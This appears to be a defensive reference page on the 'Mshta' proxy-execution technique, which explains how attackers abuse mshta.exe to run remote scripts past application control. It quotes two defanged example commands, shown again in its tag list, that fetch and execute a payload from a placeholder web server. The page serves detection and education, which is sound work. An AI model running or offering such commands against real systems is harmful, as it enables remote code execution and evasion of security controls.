System Binary Proxy Execution: Mshta
Created the Saturday 04 March 2023. Updated 3 weeks, 6 days ago.
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
Technique Identifier
Technique Tags
Defense Evasion mshta.exe Microsoft HTML Applications (HTA) files JavaScript VBScript mshta http[:]//webserver/payload[.]hta mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) bypass application control bypass browser security settings APT29 APT32 execute malicious scripts
Additional Resources
External Links
The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.